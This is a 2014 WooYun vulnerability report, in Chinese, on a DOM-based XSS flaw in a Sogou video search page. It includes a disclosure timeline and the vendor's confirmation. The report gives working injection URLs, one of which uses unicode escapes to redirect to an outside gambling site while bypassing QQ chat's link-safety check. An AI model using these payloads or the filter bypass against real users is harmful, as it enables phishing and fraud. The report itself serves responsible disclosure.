漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-050788
漏洞标题:搜狗搜索引擎domxss漏洞可钓鱼(绕过聊天窗口检测QQ提示绿标)
相关厂商:搜狗
漏洞作者: 大牛
提交时间:2014-02-13 14:13
修复时间:2014-03-30 14:13
公开时间:2014-03-30 14:13
漏洞类型:xss跨站脚本攻击
危害等级:低
自评Rank:6
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-02-13: 细节已通知厂商并且等待厂商处理中
2014-02-13: 厂商已经确认,细节仅向厂商公开
2014-02-23: 细节向核心白帽子及相关领域专家公开
2014-03-05: 细节向普通白帽子公开
2014-03-15: 细节向实习白帽子公开
2014-03-30: 细节向公众公开
简要描述:
可挂马钓鱼
详细说明:
在乌云看到这样一个例子:http://wooyun.org/bugs/wooyun-2010-048040
心想找个搜狗的搜索xss 应该能换个邀请码了吧?
找到如下url地址:
http://v.sogou.com/vc/topic.jsp?s_url=[内容可控]
通过一些方法绕出了js
通过一些fuzz测试之后。
http://v.sogou.com/vc/topic.jsp?s_url=http://baidu.com%22}%0aalert(1)%0a//
成功弹出:alert
挺有意思,那么我们试试直接通过location.href的方式跳转看看能不能绿标
构造如下代码:
http://v.sogou.com/vc/topic.jsp?s_url=%22}%0alocation.href=%22http://www.phpbug.cn%22%0a//
很是遗憾,竟然没有绿标
通过fuzz之后发现 凡是带有http:// 均会检测,并且拦截一次。
http:/ 不拦截
回到上面的xss,既然知道这样的特性,我们可以利用js转码。
将网页转码之后跳转到我们的钓鱼网站不就完成了吗?
在百度搜了一个菠菜网站:http://www.131333.com/
通过js转码之后加入我们的url
最后生成url地址:
http://v.sogou.com/vc/topic.jsp?s_url=%22}%0alocation.href=%22\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0031\u0033\u0031\u0033\u0033\u0033\u002e\u0063\u006f\u006d%22%0a//
回到QQ聊天窗口,这个时候已经绿标。
漏洞证明:
请看详细说明
修复方案:
对传入 uigs_para 变量的值处理一下。不要让他绕出来了
版权声明:转载请注明来源 大牛@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:6
确认时间:2014-02-13 14:41
厂商回复:
感谢提供漏洞报告,正在安排修复
最新状态:
暂无